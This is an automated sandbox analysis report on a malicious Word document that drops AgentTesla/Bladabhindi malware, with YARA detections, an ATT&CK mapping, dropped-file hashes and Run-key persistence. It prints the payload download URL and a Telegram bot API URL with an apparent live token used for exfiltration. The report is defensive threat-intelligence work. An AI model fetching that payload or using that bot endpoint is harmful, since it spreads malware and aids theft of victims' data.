Source: Yara match, File source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.CTF loader_es.exe.3c1ac88.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.7.raw.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: number of queries: 2505

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e410a8.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.CTF loader_es.exe.3c1ac88.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.7.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Command and Scripting Interpreter 1 | Startup Items 1 | Startup Items 1 | Masquerading 221 | OS Credential Dumping | Security Software Discovery 21 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Web Service 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution 13 | Registry Run Keys / Startup Folder 221 | Access Token Manipulation 1 | Disable or Modify Tools 11 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 111 | Virtualization/Sandbox Evasion 121 | Security Account Manager | Virtualization/Sandbox Evasion 121 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 221 | Access Token Manipulation 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 111 | LSA Secrets | File and Directory Discovery 12 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 12 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 1 | Cached Domain Credentials | System Information Discovery 14 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Timestomp 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

Behavior Graph

[Behavior graph image not preserved. Behavior Graph ID: 404236; Sample: Allignright_companyprofile.doc; Startdate: 04/05/2021; Architecture: WINDOWS; Score: 100]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Allignright_companyprofile.doc | 15% | ReversingLabs | Document-RTF.Exploit.Heuristic

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\CTF loader_es.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | 100% | Joe Sandbox ML |
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe | 41% | Virustotal |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe | 19% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe | 45% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\CTF loader_es.exe | 41% | Virustotal |
C:\Users\user\AppData\Roaming\CTF loader_es.exe | 19% | Metadefender |
C:\Users\user\AppData\Roaming\CTF loader_es.exe | 45% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | 41% | Virustotal |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | 19% | Metadefender |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | 45% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe | 19% | Metadefender |
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe | 45% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-us-west-2-r-w.amazonaws.com | 52.218.240.113 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
miolouno.s3-us-west-2.amazonaws.com | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://miolouno.s3-us-west-2.amazonaws.com/mad.exe | false | | high

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmp | false | | high
http://www.icra.org/vocabulary/. | CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | CTF loader_es.exe, 00000004.00000002.2201019666.00000000052B0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2120486810.0000000002210000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000003.2110241441.0000000000407000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2110770668.00000000005AA000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleaner | powershell.exe, 00000005.00000003.2110241441.0000000000407000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2110770668.00000000005AA000.00000004.00000001.sdmp | false | | high
https://api.telegram.org/bot1774464259:AAF9FzZxHVqbPEcJ50c3sNsdvyt_OEQ0GcA/ | CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmp | false | | high
http://www.%s.comPA | CTF loader_es.exe, 00000004.00000002.2201019666.00000000052B0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2120486810.0000000002210000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CTF loader_es.exe, 00000004.00000003.2124857296.0000000002B2B000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.218.240.113 | s3-us-west-2-r-w.amazonaws.com | United States | 16509 | AMAZON-02US | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 404236
Start date: 04.05.2021
Start time: 20:30:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 55s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Allignright_companyprofile.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.adwa.expl.evad.winDOC@46/28@3/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 909
• Number of non-executed functions: 1
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
20:30:38 | API Interceptor | 152x Sleep call for process: EQNEDT32.EXE modified
20:30:43 | API Interceptor | 219x Sleep call for process: CTF loader_es.exe modified
20:30:51 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
20:30:52 | API Interceptor | 243x Sleep call for process: powershell.exe modified
20:30:57 | API Interceptor | 178x Sleep call for process: Bw6d8Paf6bOV36xS4N6.exe modified
20:31:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6 C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
20:31:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6 C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
20:31:15 | API Interceptor | 8x Sleep call for process: svchost.exe modified
20:31:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe
20:31:49 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe

Joe Sandbox View / Context

IPs

No context

Domains


ASN


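JA3 Fingerprints

No context

Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Roaming\CTF loader_es.exe | PO5421-allignright.doc | malicious
C:\Users\user\AppData\Roaming\CTF loader_es.exe | lsqtIv1jRK.exe | malicious
C:\Users\user\AppData\Roaming\CTF loader_es.exe | 04052021paymentscancopy.doc | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe | PO5421-allignright.doc | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe | lsqtIv1jRK.exe | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe | 04052021paymentscancopy.doc | malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | PO5421-allignright.doc | malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | lsqtIv1jRK.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | 04052021paymentscancopy.doc | malicious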

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 3367424
Entropy (8bit): 2.545995908897728
Encrypted: false
SSDEEP: 6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
MD5: D96F52FC8733D2F4A127BDC44D4CEB25
SHA1: E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
SHA-256: FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
SHA-512: 08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Virustotal, Detection: 41%
• Antivirus: Metadefender, Detection: 19%
• Antivirus: ReversingLabs, Detection: 45%
Joe Sandbox View:
• Filename: PO5421-allignright.doc, Detection: malicious
• Filename: lsqtIv1jRK.exe, Detection: malicious
• Filename: 04052021paymentscancopy.doc, Detection: malicious
IE Cache URL: http://miolouno.s3-us-west-2.amazonaws.com/mad.exe
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08186652-BACB-4000-A55F-0BCBA7498F21}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1536
                                                  Entropy (8bit):1.3539040104691664
                                                  Encrypted:false
                                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbg:IiiiiiiiiifdLloZQc8++lsJe1Mzv
                                                  MD5:F6F80D0BE464ED6C743C599B4F12385A
                                                  SHA1:0CF4030CC325956908EFA90CD1373A2868568127
                                                  SHA-256:520A9042C743B61A0779F861EE3834C35F05788DE16B75553B783CF806ACF8EB
                                                  SHA-512:F53D7E037981669FB252F430393AC3AD3377F918969FF92DDBC89B6C5910C6000D3FEEF2F21D2DCBBB6D4ADB2D3B340FE3783F1A58C47CC86E8B3DB021C68878
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{784A4D1B-DE8E-4300-98F0-AE5841A8170E}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.05390218305374581
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lYdn:4Wn
                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A867ADF-3614-4635-BF44-6C9AC8D8FC42}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):163588
                                                  Entropy (8bit):3.745470873702184
                                                  Encrypted:false
                                                  SSDEEP:3072:+aAP+8FK1tm7YjkaipdiykZDCMbo0niY+uuDQKDCT:+FP+8miY4XLkdCP99QKGT
                                                  MD5:22FA8C878B114CA89FCABF13B0A044A3
                                                  SHA1:B449173A1CF65240EE376FC7638E3DEFD60C756A
                                                  SHA-256:D5D2CC035B4B850137BCE5E195357E5979FA3BF0FDFC57BFB925A07DF8A0DA26
                                                  SHA-512:AB02781F60B00CAC23800F49C5AF1FAD2298CFF01FE79B22C5F5F9E3FC723BEB9B96A1232A1A7001E1E81437E4A7938AA137EB6E62B5F1EBBBE8D7CB42F1CB61
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Temp\1048825.cvr
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):1576
                                                  Entropy (8bit):3.4417743183760896
                                                  Encrypted:false
                                                  SSDEEP:48:LAll/H56+Rpjx4KHtKFlnL99+xxxWRb0Ga2KO93/cwm6:LA//Z6+7is4L99+xxxmYGn/m6
                                                  MD5:3E4F2F6075550D074C558371CC9CC9BD
                                                  SHA1:016C582ED7753219CF8EB9B32DEFC0414D600A62
                                                  SHA-256:E751A1D686FD0F3A015350A5CDFD234A666CA7FD8A198CD4ACA11A7E32A0062D
                                                  SHA-512:3489647347CACB06C9D3B2B34FD8D8C38E77EB2AA374DFE0E4F9F0865A67FA14C365245428E517DFBA9C2DDA8BF81B1CB5DC902190FC56ADAEB6AFD078AA3AF1
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Virustotal, Detection: 41%
                                                  • Antivirus: Metadefender, Detection: 19%
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Joe Sandbox View:
                                                  • Filename: PO5421-allignright.doc, Detection: malicious
                                                  • Filename: lsqtIv1jRK.exe, Detection: malicious
                                                  • Filename: 04052021paymentscancopy.doc, Detection: malicious
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Allignright_companyprofile.LNK
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Wed May 5 02:30:36 2021, length=2960089, window=hide
                                                  Category:dropped
                                                  Size (bytes):2188
                                                  Entropy (8bit):4.590602032190979
                                                  Encrypted:false
                                                  SSDEEP:48:8o/XTFGq79iDn1sQh2o/XTFGq79iDn1sQ/:8o/XJGq7wn1sQh2o/XJGq7wn1sQ/
                                                  MD5:5BBBD72D10C21586DEE0CAD09ADD2B8D
                                                  SHA1:0760C3EB44A74A4F750A6C424CB4D8A04CD9EE9E
                                                  SHA-256:5A5F1A263529163165FC2CBD84E9B4548FBF329A5422EBE9EF1FC6AFC5DE4504
                                                  SHA-512:A2024E2E338C1B239C2ECB5B360246DF703C305F3F0B66C871796076079D6FAADBCEF1B3AEF04C0DDB0EE3F05126C11A78096B82170E5D0C3B08E82B4AF7DDE3
                                                  Malicious:false
                                                  Preview: L..................F.... ...T.S..{..T.S..{..0Cy._A...*-..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..*-..R.. .ALLIGN~1.DOC..j.......Q.y.Q.y*...8.....................A.l.l.i.g.n.r.i.g.h.t._.c.o.m.p.a.n.y.p.r.o.f.i.l.e...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop\Allignright_companyprofile.doc.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.l.l.i.g.n.r.i.g.h.t._.c.o.m.p.a.n.y.p.r.o.f.i.l.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.....
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):116
                                                  Entropy (8bit):4.657550098584195
                                                  Encrypted:false
                                                  SSDEEP:3:M1tybVKxAl8JJjbVKxAlmX1tybVKxAlv:MTyExAGVExA0yExA1
                                                  MD5:FA26198640628CEC6D776D7BB8A4A7EB
                                                  SHA1:080BF5E7446190648986780F4D9E666D74087362
                                                  SHA-256:A3B64602BA15FFB5E8DC508D21A6BEFB4BDBBEDD8CA5014794C05002FA8023EF
                                                  SHA-512:8B3C10ABFF4F2050A7CB86542F856DB4CEF253D79BDA0301F5608519742E5C8292A4216CC58D8383AF54C716E6E7C07F5DC12B45E4F9ABB2D34501748AAFC3D5
                                                  Malicious:false
                                                  Preview: [doc]..Allignright_companyprofile.LNK=0..Allignright_companyprofile.LNK=0..[doc]..Allignright_companyprofile.LNK=0..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.431160061181642
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                  MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                  SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                  SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                  SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                  Malicious:false
                                                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:3:Qn:Qn
                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                  Malicious:false
                                                  Preview: ..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0B643QLK5ZML9R9E3HST.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\14LJSV38HUMSQNNUJ4FI.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
